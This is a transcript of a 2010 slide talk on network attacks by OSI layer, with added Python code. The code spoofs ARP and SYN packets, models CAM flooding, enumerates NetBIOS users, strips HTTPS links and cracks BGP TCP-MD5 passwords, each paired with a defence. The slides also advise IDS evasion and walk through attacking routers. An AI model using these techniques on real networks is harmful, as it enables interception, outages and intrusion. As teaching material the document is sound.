Deep knowledge on network hacking philosophy
DESCRIPTION
Presentation on network hacking philosophy, in depth.
TRANSCRIPT
DEEP KNOWLEDGE ON NETWORK HACKING PHILOSOPHY
ATIK PILIHANTO, MAKASAR, DEC 2010, http://ipsecs.com
PHILOSOPHY
General and fundamental knowledge about the objective of a problem.
Network Hacking Philosophy?? Basic and fundamental understanding of computer networks and of the vulnerabilities in communication protocols.
Let's start to understand our network!
OSI MODEL
The OSI model has 7 layers: physical, data link, network, transport, session, presentation, and application.
RELATION BETWEEN HACKING AND OSI
OSI describes in general and fundamental terms how digital communication works.
Which technology sits at each layer?
Does this technology exist in your network? Or which technology is used?
Vulnerability, attack vector, impact, and how to exploit?
OSI : Layer #1 - Physical
Example technologies; IEEE 802.3, IEEE 802.11, IEEE 802.16, SONET/SDH, ADSL
Attack vector; can the attacker reach the Layer #1 technology? Physical access?
Impact; mostly Denial of Service.
Example vulnerability; N/A
How to exploit; cutting a fiber cable, jamming the wireless (802.11/802.16) signal.
Not so interesting, but it does happen!
OSI : Layer #2 - Data Link
Example technologies; Layer 2 switch (IEEE 802.3), ARP, ATM, and frame relay.
Attack vector; can the attacker reach the Layer #2 technology? Local Area Network?
Impact; loss of confidentiality and integrity, Denial of Service
Example vulnerability; the switch's CAM table size limit, and ARP cache poisoning
How to exploit; CAM table flooding and ARP cache poisoning, aiming at DoS or Man in The Middle; yersinia L2 attack toolkit
Exploitation at layer #2 is often combined with other attacks, for example sniffing and replay attacks.
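The two layer #2 vulnerabilities above, as an added example in Python that is not part of the original slides: a spoofed ARP reply built the way yersinia or arpspoof would build it, the arpwatch-style check that catches it, and a model switch whose bounded CAM table fails open to flooding once it is full. The MAC and IP addresses, port numbers and CAM capacity are made up for the example.

```python
import struct
from collections import OrderedDict

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for the example (not from the slides).
VICTIM_MAC, VICTIM_IP = "aa:aa:aa:aa:aa:01", "10.0.0.10"
GATEWAY_MAC, GATEWAY_IP = "bb:bb:bb:bb:bb:02", "10.0.0.1"
ATTACKER_MAC = "cc:cc:cc:cc:cc:03"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP (RFC 826). ARP carries no authentication, so a reply
    that claims the gateway's IP with the attacker's MAC is accepted as-is."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # HTYPE, PTYPE, HLEN, PLEN, OPER
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp_frame(frame):
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
    }


def sample_poison_frames():
    """Constructed capture: the real gateway answers, then the attacker's
    spoofed reply rebinds the gateway IP to the attacker's MAC."""
    return [
        build_arp_frame(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp_frame(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    ]


def detect_arp_poisoning(frames):
    """Return (ip, old_mac, new_mac) whenever an IP's claimed MAC changes.
    This is the arpwatch approach: with no authentication in ARP, a binding
    that flips under you is the only signal a passive observer has."""
    seen, alerts = {}, []
    for frame in frames:
        arp = parse_arp_frame(frame)
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in seen and seen[ip] != mac:
            alerts.append((ip, seen[ip], mac))
        seen[ip] = mac
    return alerts


class Switch:
    """Learning switch with a bounded CAM table (oldest entry evicted first).
    Real switches differ in eviction policy, but the failure mode is the same:
    a frame for a MAC that is no longer in the table is flooded to every port."""

    def __init__(self, ports, cam_capacity):
        self.ports = set(ports)
        self.capacity = cam_capacity
        self.cam = OrderedDict()

    def forward(self, src_mac, dst_mac, in_port):
        if src_mac not in self.cam and len(self.cam) >= self.capacity:
            self.cam.popitem(last=False)  # table full: evict the oldest entry
        self.cam[src_mac] = in_port
        if dst_mac in self.cam:
            return {self.cam[dst_mac]}
        return self.ports - {in_port}  # unknown destination: flood


def cam_flood_demo(capacity=64, attacker_port=3):
    """Victim on port 1, gateway on port 2, attacker on port 3. Returns the
    egress ports of a gateway->victim frame before and after the attacker
    floods the table with `capacity` bogus source MACs (macof style)."""
    sw = Switch(ports=[1, 2, attacker_port], cam_capacity=capacity)
    sw.forward(VICTIM_MAC, "ff:ff:ff:ff:ff:ff", 1)
    sw.forward(GATEWAY_MAC, "ff:ff:ff:ff:ff:ff", 2)
    before = sw.forward(GATEWAY_MAC, VICTIM_MAC, 2)
    for i in range(capacity):
        bogus = f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}"
        sw.forward(bogus, "ff:ff:ff:ff:ff:ff", attacker_port)
    after = sw.forward(GATEWAY_MAC, VICTIM_MAC, 2)
    return before, after


if __name__ == "__main__":
    print(detect_arp_poisoning(sample_poison_frames()))
    print(cam_flood_demo())
```

After the flood the gateway-to-victim frame is also copied to the attacker's port, which is why CAM flooding and ARP poisoning both end in the same place: sniffing. Port security (a per-port MAC limit) and dynamic ARP inspection are the switch-side answers to the two techniques.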
OSI : Layer #3 - Network
Example technologies; IP, ICMP, IPsec, and routing protocols.
Attack vector; can the attacker reach the Layer #3 technology? Remotely accessible?
Impact; loss of confidentiality and integrity, Denial of Service
Example vulnerability; packet spoofing, security holes in routing protocols, and security holes in IPsec
How to exploit; IP spoofing, IP fragmentation, ICMP smurfing, BGP Man in The Middle, BGP NLRI injection, LDP injection on MPLS, GRE traffic tunneling, and the loki project
Exploitation at layer #3 is often combined with other attacks, for example sniffing
OSI : Layer #4 - Transport
Example technologies; UDP, TCP, SCTP
Attack vector; can the attacker reach the Layer #4 technology? Remotely accessible?
Impact; loss of confidentiality and integrity, Denial of Service, and gaining access.
Example vulnerability; packet spoofing, and session hijacking
How to exploit; SYN flooding, UDP flooding, TCP session hijacking, SCTP scanning to find SS7 network entry points
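IP spoofing from the layer #3 slide and SYN flooding from the layer #4 slide in one added example, not from the original slides: it builds a spoofed SYN with correct IP and TCP checksums to show that the receiving stack has nothing to reject, then models a listener's half-open table with and without SYN cookies. Addresses, ports and the cookie secret are constructed, and the cookie is simplified (real SYN cookies also encode the MSS and a time slot).

```python
import hashlib
import hmac
import struct

TCP_SYN = 0x02
# Constructed target for the example (not from the slides): a router's BGP port.
VICTIM_IP, BGP_PORT = "192.0.2.10", 179


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def inet_checksum(data):
    """RFC 1071 one's-complement sum; yields 0 over data that already
    carries a correct checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_tcp(src_ip, dst_ip, sport, dport, seq, flags, ack=0, payload=b""):
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(hdr) + len(payload))
    csum = inet_checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def build_ipv4(src_ip, dst_ip, payload, proto=6, ttl=64, ident=0):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0x4000,
                      ttl, proto, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + payload


def verify_packet(packet):
    """What the receiving stack checks: both checksums. Neither binds the
    source address to whoever actually put the packet on the wire."""
    ip_hdr, seg = packet[:20], packet[20:]
    pseudo = ip_hdr[12:16] + ip_hdr[16:20] + struct.pack("!BBH", 0, ip_hdr[9], len(seg))
    return inet_checksum(ip_hdr) == 0 and inet_checksum(pseudo + seg) == 0


def spoofed_syn(fake_src, dst_ip, dport, seq, sport=40000):
    """SYN with a made-up IP source: the SYN-ACK goes to that address, the
    handshake never completes, and the half-open entry sits in the backlog."""
    return build_ipv4(fake_src, dst_ip, build_tcp(fake_src, dst_ip, sport, dport, seq, TCP_SYN))


class Listener:
    """Half-open table of a listening socket. Without SYN cookies the table
    has a fixed backlog and unanswered SYNs fill it; with SYN cookies the
    server keeps no state and derives its ISN from an HMAC of the 4-tuple."""

    def __init__(self, backlog, syn_cookies=False, secret=b"constructed-secret"):
        self.backlog, self.syn_cookies, self.secret = backlog, syn_cookies, secret
        self.half_open = {}

    def _cookie(self, src_ip, sport, client_isn):
        msg = f"{src_ip}:{sport}:{client_isn}".encode()
        return int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:4], "big")

    def on_syn(self, src_ip, sport, client_isn):
        """Server ISN that goes into the SYN-ACK, or None if the SYN is dropped."""
        if self.syn_cookies:
            return self._cookie(src_ip, sport, client_isn)
        if len(self.half_open) >= self.backlog:
            return None
        server_isn = 0x1000 + len(self.half_open)
        self.half_open[(src_ip, sport)] = server_isn
        return server_isn

    def on_ack(self, src_ip, sport, seq, ack):
        """True if the client's final ACK (seq = client_isn + 1) completes a handshake."""
        if self.syn_cookies:
            return ack - 1 == self._cookie(src_ip, sport, seq - 1)
        return self.half_open.pop((src_ip, sport), None) == ack - 1


def syn_flood_demo(backlog=128, flood=256):
    """Does a legitimate client still get a SYN-ACK after `flood` spoofed SYNs?
    Returns (without cookies, with cookies)."""
    results = []
    for cookies in (False, True):
        srv = Listener(backlog, syn_cookies=cookies)
        for i in range(flood):
            src = f"203.0.113.{i % 256}"
            pkt = spoofed_syn(src, VICTIM_IP, BGP_PORT, seq=1, sport=50000 + i)
            if not verify_packet(pkt):
                raise AssertionError("spoofed packet should pass checksum checks")
            srv.on_syn(src, 50000 + i, 1)
        results.append(srv.on_syn("198.51.100.5", 5555, 7) is not None)
    return tuple(results)


if __name__ == "__main__":
    print(syn_flood_demo())
```

The point the slide makes about layer #4 being "easy to prevent" holds here: the fix is not a patch on the victim but a stateless answer (SYN cookies), ingress filtering of spoofed sources (BCP 38), or a firewall in front of port 179.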
OSI : Layer #5 - Session
Example technologies; NetBIOS, L2TP, PPTP
Attack vector; can the attacker reach the Layer #5 technology? Remotely accessible?
Impact; loss of confidentiality, and gaining access.
Example vulnerability; user enumeration
How to exploit; enumerate users using NetBIOS
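NetBIOS user enumeration as an added example, not from the original slides: the node status request that nbtstat -A or nmblookup -A sends to UDP/137, a parser for the reply, and the rule that turns the returned name table into a list of logged-on users. The reply is constructed inline (host FILESRV01, domain CORPDOMAIN, user JSMITH, MAC 00:11:22:33:44:55), so nothing goes on the wire.

```python
import struct

NBSTAT, CLASS_IN = 0x0021, 0x0001
SUFFIX_WORKSTATION, SUFFIX_MESSENGER, SUFFIX_FILESERVER = 0x00, 0x03, 0x20


def encode_nb_name(name, suffix, pad=b" "):
    """First-level encoding (RFC 1001 section 14.1): the 16-byte NetBIOS name
    becomes 32 letters A-P, one per nibble, wrapped as a single label."""
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    encoded = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([len(encoded)]) + encoded + b"\x00"


def build_node_status_request(txid):
    """The datagram nbtstat -A sends to UDP/137: a NBSTAT query for the
    wildcard name '*' (padded with NULs, not spaces)."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_nb_name("*", 0x00, pad=b"\x00") + struct.pack("!HH", NBSTAT, CLASS_IN)


def build_node_status_response(txid, names, mac):
    """Constructed reply used as sample input; names = [(name, suffix, is_group)]."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response, authoritative
    body = bytes([len(names)])
    for name, suffix, group in names:
        flags = (0x8000 if group else 0x0000) | 0x0400  # G bit, ACT bit
        body += name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix]) + struct.pack("!H", flags)
    body += mac + bytes(40)  # 46-byte statistics block: unit id (MAC), then zeroed counters
    rr = encode_nb_name("*", 0x00, pad=b"\x00") + struct.pack("!HHIH", NBSTAT, CLASS_IN, 0, len(body))
    return header + rr + body


def parse_node_status_response(data):
    """Return ([(name, suffix, is_group), ...], mac) from a node status reply."""
    _txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a NBNS response carrying one answer")
    pos = 12
    pos += 1 + data[pos] + 1  # skip the answer name: length byte, label, terminator
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT:
        raise ValueError("answer is not a NBSTAT record")
    count = data[pos]
    pos += 1
    entries = []
    for _ in range(count):
        raw = data[pos:pos + 18]
        pos += 18
        name = raw[:15].rstrip(b" ").decode("ascii", "replace")
        nflags = struct.unpack("!H", raw[16:18])[0]
        entries.append((name, raw[15], bool(nflags & 0x8000)))
    mac = ":".join(f"{b:02x}" for b in data[pos:pos + 6])
    return entries, mac


def enumerate_users(entries):
    """The Messenger service registers a unique <03> name for the machine and
    one per logged-on user; drop the machine names (unique <00>) and the
    remaining <03> names are users."""
    machines = {n for n, s, g in entries if s == SUFFIX_WORKSTATION and not g}
    return sorted(n for n, s, g in entries if s == SUFFIX_MESSENGER and not g and n not in machines)


def sample_response():
    """Constructed sample: a file server in a domain with one interactive user."""
    return build_node_status_response(0x1234, [
        ("FILESRV01", SUFFIX_WORKSTATION, False),
        ("CORPDOMAIN", SUFFIX_WORKSTATION, True),
        ("FILESRV01", SUFFIX_FILESERVER, False),
        ("FILESRV01", SUFFIX_MESSENGER, False),
        ("JSMITH", SUFFIX_MESSENGER, False),
    ], bytes.fromhex("001122334455"))


if __name__ == "__main__":
    entries, mac = parse_node_status_response(sample_response())
    print(mac, entries, enumerate_users(entries))
```

The request is unauthenticated and answered by any host with NetBIOS over TCP/IP enabled, which is why the slide lists it as the layer #5 example; blocking UDP/137 at the perimeter and disabling NetBIOS where SMB over 445 suffices removes the information leak.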
OSI : Layer #6 - Presentation
Example technologies; SSL, TLS
Attack vector; can the attacker reach the Layer #6 technology? Remotely accessible?
Impact; loss of confidentiality and integrity, and gaining access.
Example vulnerability; SSL Man in The Middle
How to exploit; SSL Man in The Middle with dsniff or sslstrip
Exploitation at layer #6 is often combined with other attacks, for example sniffing
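The sslstrip technique as an added example, not sslstrip's own code and not from the original slides: a proxy in the MITM position (obtained at layer #2, as the slide says) rewrites https:// links and Location headers to http:// on their way to the victim, remembers what it downgraded, and speaks TLS to the real server itself. The hostnames are made up. The last function is the caveat a practitioner needs today: a host on the browser's HSTS list (preloaded, or learned from a Strict-Transport-Security header over an earlier good connection) is upgraded inside the browser before any request leaves, so the stripped link is never followed over plain HTTP.

```python
import re
from urllib.parse import urlsplit

# Constructed hostnames for the example (not from the slides).
HSTS_PRELOADED = {"bank.example"}

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class StripProxy:
    """Transparent HTTP proxy in the MITM position. Responses to the victim get
    every https:// link rewritten to http://; the proxy records what it
    downgraded so that when the victim follows such a link, the proxy fetches
    it over TLS and the server never notices anything unusual."""

    def __init__(self):
        self.stripped = set()  # "host/path" keys the victim now sees as plain http

    def _key(self, url):
        parts = urlsplit(url)
        return parts.netloc.lower() + (parts.path or "/")

    def rewrite_response(self, body):
        """Response body from the server, on its way to the victim."""
        def downgrade(match):
            self.stripped.add(self._key(match.group(0)))
            return "http://" + match.group(0)[len("https://"):]
        return HTTPS_URL.sub(downgrade, body)

    def rewrite_headers(self, headers):
        """A redirect to https is usually the first step into a login; strip it too."""
        return {k: (self.rewrite_response(v) if k.lower() == "location" else v)
                for k, v in headers.items()}

    def upstream_url(self, victim_url):
        """URL the proxy fetches on the victim's behalf: TLS for anything it downgraded."""
        if victim_url.startswith("http://") and self._key(victim_url) in self.stripped:
            return "https://" + victim_url[len("http://"):]
        return victim_url


def victim_sends_plaintext(host, hsts_hosts=HSTS_PRELOADED, learned_hsts=frozenset()):
    """The browser-side check that defeats the proxy: with an HSTS entry for
    the host, the browser rewrites http:// to https:// before sending, so
    the stripped link never produces a plaintext request to intercept."""
    return host not in hsts_hosts and host not in learned_hsts


def demo():
    """Constructed page: a login link on a bank and an image on a CDN."""
    proxy = StripProxy()
    html = ('<a href="https://bank.example/login">Log in</a>'
            '<img src="https://cdn.example/logo.png">')
    page = proxy.rewrite_response(html)
    return page, proxy.upstream_url("http://bank.example/login"), proxy.upstream_url("http://news.example/")


if __name__ == "__main__":
    print(demo())
    print(victim_sends_plaintext("bank.example"), victim_sends_plaintext("news.example"))
```

Nothing here breaks TLS: the victim simply never starts a TLS session, which is why the attack lives at layer #6 in the slide's model and why the fix (HSTS, plus refusing to serve logins over http at all) lives in the browser and the application, not in the cipher suite.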
OSI : Layer #7 - Application
Example technologies; HTTP, SMTP, DNS, SSH, FTP
Attack vector; can the attacker reach the Layer #7 technology? Remotely accessible?
Impact; loss of confidentiality and integrity, Denial of Service, and gaining access.
Example vulnerability; buffer overflow, format string, web application vulnerabilities.
How to exploit; exploiting a buffer overflow or format string bug to gain access or cause denial of service; exploiting a web application to gain access
KNOWING YOURSELF
At which layer do you have access? Layer 1, 2, 3, 4, 5, 6, 7, or all of them?
The closer you are to the lowest layer, the better your chance to win the war
KNOWING YOUR ENEMY
Reconnaissance to gain as much information as possible about the enemy
Scanning to learn which hosts are alive and which services are running
The more information you have about your enemy, the better your chance to win the war
IF YOU KNOW BOTH YOURSELF AND YOUR ENEMY - YOU WILL WIN IN MANY WARS - SUN TZU
THINGS TO REMEMBER
Transport-set vulnerability:
Easy to prevent (Firewall, ACL)
Hard to fix (Update, Patch)
Application-set vulnerability:
Hard to prevent (Firewall, ACL)
Easy to fix (Update, Patch)
THINGS TO REMEMBER
Keep anonymous and stealthy, don't be so rough!
Man in the middle example on Layer #2:
ARP cache poisoning OR CAM table flooding?
Exploiting a remote buffer overflow on Layer #7:
Evading IDS/IPS/IDP
Polymorphic, encoded shellcode OR IP fragmentation??
AN EXAMPLE
Routers A, B, C, and D run BGP and SSH and are reachable from the attacker's laptop and from the admin's laptop
The attacker is not connected to the admin's laptop and is on a different network from routers A, B, C, and D
KNOWING YOUR ENEMY
The attacker (you) wants to compromise the MPLS VPN network
He can't attack the administrator's computer directly
After host enumeration, he knows there are four routers on the network
After service scanning, he knows all routers run SSH and BGP
After vulnerability scanning, he knows some routers have vulnerabilities
The attacker searches the search engines for everything related to the administrator: e-mail addresses and much more
KNOWING YOURSELF
Do you have access to layer #1? No
Do you have access to layer #2? No
Do you have access to layer #3? Yes, useful for exploitation
Do you have access to layer #4? Yes, useful for exploitation
Do you have access to layer #5? Yes, not applicable
Do you have access to layer #6? Yes, not applicable
Do you have access to layer #7? Yes, useful for exploitation
SO WHAT??
LAYER #3 ATTACK
Border Gateway Protocol attack? BGP Man In The Middle
BGP NLRI injection to reroute traffic
BGP MD5 crack if applicable
MPLS attack? LDP injection to rewrite labels
ICMP? ICMP flooding and denial of service
Really useful once one router has been compromised!
LAYER #4 ATTACK
TCP?
SYN flooding the SSH and BGP ports, causing denial of service
TCP FIN/RST to close an established BGP session
UDP and the other layer #4 protocols are not applicable
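The "BGP MD5 crack if applicable" item on the layer #3 slide, as an added example that is not from the original slides: TCP MD5 (RFC 2385) signs each BGP segment with a plain unsalted MD5 over public header fields plus the shared password, so one captured signed segment is enough for an offline dictionary attack. The same option is also what stops the FIN/RST attack on the layer #4 slide, because a RST without a valid signature is discarded. Router addresses, port, sequence numbers, password and the wordlist in the usage example are constructed.

```python
import hashlib
import struct

TCP_ACK_PSH = 0x18
TCPOPT_NOP, TCPOPT_MD5SIG = 1, 19
# RFC 4271 KEEPALIVE: 16-byte marker of 0xff, length 19, type 4.
BGP_KEEPALIVE = b"\xff" * 16 + struct.pack("!HB", 19, 4)
# Constructed peer addresses and password for the example (not from the slides).
ROUTER_A, ROUTER_B, PASSWORD = "10.0.0.1", "10.0.0.2", b"bgp-peer-2010"


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def tcp_md5_digest(src_ip, dst_ip, tcp_header, payload, password):
    """RFC 2385 section 2: MD5 over (1) the TCP pseudo-header, (2) the 20-byte
    TCP header with options excluded and checksum zeroed, (3) the segment data,
    (4) the shared password. The length in (1) does include the options."""
    pseudo = ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(tcp_header) + len(payload))
    base = tcp_header[:16] + b"\x00\x00" + tcp_header[18:20]
    return hashlib.md5(pseudo + base + payload + password).digest()


def build_signed_segment(src_ip, dst_ip, sport, dport, seq, ack, payload, password):
    """TCP segment with a 2-NOP-padded MD5 option (kind 19, length 18), so the
    data offset is 10 words. The TCP checksum is left at zero here: it is not
    covered by the signature and is irrelevant to the attack."""
    opts = bytes([TCPOPT_NOP, TCPOPT_NOP, TCPOPT_MD5SIG, 18]) + bytes(16)
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 10 << 4, TCP_ACK_PSH, 65535, 0, 0)
    digest = tcp_md5_digest(src_ip, dst_ip, hdr + opts, payload, password)
    return hdr + opts[:4] + digest + payload


def split_segment(segment):
    doff = (segment[12] >> 4) * 4
    return segment[:doff], segment[doff:]


def extract_md5_option(segment):
    """Walk the options and return the 16-byte signature, or None."""
    header, _ = split_segment(segment)
    i = 20
    while i < len(header):
        kind = header[i]
        if kind == 0:
            break
        if kind == TCPOPT_NOP:
            i += 1
            continue
        length = header[i + 1]
        if length < 2:
            break  # malformed option; stop rather than loop forever
        if kind == TCPOPT_MD5SIG and length == 18:
            return header[i + 2:i + 18]
        i += length
    return None


def verify_signed_segment(src_ip, dst_ip, segment, password):
    """What the receiving router does with the option: recompute and compare.
    Unsigned or wrongly signed segments, RSTs included, are dropped."""
    header, payload = split_segment(segment)
    return extract_md5_option(segment) == tcp_md5_digest(src_ip, dst_ip, header, payload, password)


def crack_tcp_md5(src_ip, dst_ip, segment, wordlist):
    """Offline dictionary attack on one captured signed segment: every field
    in the MD5 input except the password is visible on the wire, so each
    guess costs one MD5. Returns the password or None."""
    observed = extract_md5_option(segment)
    if observed is None:
        return None
    header, payload = split_segment(segment)
    for guess in wordlist:
        if tcp_md5_digest(src_ip, dst_ip, header, payload, guess) == observed:
            return guess
    return None


def sample_capture():
    """Constructed: one signed KEEPALIVE from router A to router B."""
    return build_signed_segment(ROUTER_A, ROUTER_B, 179, 45123, 0x1000, 0x2000, BGP_KEEPALIVE, PASSWORD)


if __name__ == "__main__":
    seg = sample_capture()
    print(crack_tcp_md5(ROUTER_A, ROUTER_B, seg, [b"cisco", b"admin", PASSWORD]))
```

"If applicable" in the slide is the right qualifier: the crack only works with a guessable password and only matters if you can already observe or inject BGP segments on path, and a strong key turns the same option into the defence against the FIN/RST and session-hijacking items listed for layer #4 (together with GTSM, which rejects BGP packets whose TTL shows they did not come from a directly connected peer).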
LAYER #7 ATTACK
Exploiting router vulnerabilities to gain access
Buffer overflow?
Format string?
Denial of service?
Guessing router usernames and passwords to gain access
Ncrack?
THC-Hydra
YES! You can use social engineering, but that's a different topic from hacking the network!
QUESTION AND ANSWER
THANK YOU